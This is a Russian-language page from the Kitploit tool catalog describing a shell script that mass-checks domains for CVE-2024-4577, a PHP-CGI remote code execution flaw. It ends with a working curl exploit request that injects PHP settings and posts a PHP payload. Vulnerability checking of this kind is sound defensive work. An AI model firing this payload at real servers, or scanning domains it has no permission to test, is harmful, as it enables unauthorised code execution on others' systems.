Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-4577 | Kitploit
Инструменты/GitHubGitHub/graphite-org/cve-2024-4577
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Проверка уязвимости CVE-2024-4577

Этот скрипт предназначен для проверки уязвимости, описываемой CVE-2024-4577, которая связана с эксплуатацией определённых конфигураций PHP для удалённого выполнения произвольного кода. Он отправляет POST-запрос на указанные endpoint'ы по списку доменов и проверяет, указывает ли ответ на уязвимость.

Использование

  1. Установите GNU Parallel:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. Клонируйте репозиторий: Клонируйте этот репозиторий на свой локальный компьютер с помощью Git:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. Перейдите в репозиторий: Перейдите в клонированный каталог:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. Подготовьте список доменов: Создайте текстовый файл, содержащий список доменов для проверки. Каждый домен должен быть на новой строке. Например:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. Запустите скрипт: Выполните скрипт CVE-2024-4577.sh, передав путь к файлу со списком доменов в качестве аргумента:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. Просмотрите вывод: Скрипт будет отображать информацию о ходе выполнения по мере проверки каждого домена. Если домен будет признан уязвимым, он будет выделен красным. Скрипт также экспортирует список уязвимых доменов в файл с именем vulnerable_domains.txt.

Экспортируемый файл: vulnerable_domains.txt

Скрипт экспортирует список уязвимых доменов в файл с именем vulnerable_domains.txt. Этот файл содержит простой список уязвимых доменов, по одному домену на строку. Для дальнейшего ручного подтверждения используйте команду curl для отправки POST-запроса на целевой endpoint домена. Замените https://dev.example.com/test.php на фактический endpoint целевого домена.

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
Скачать инструмент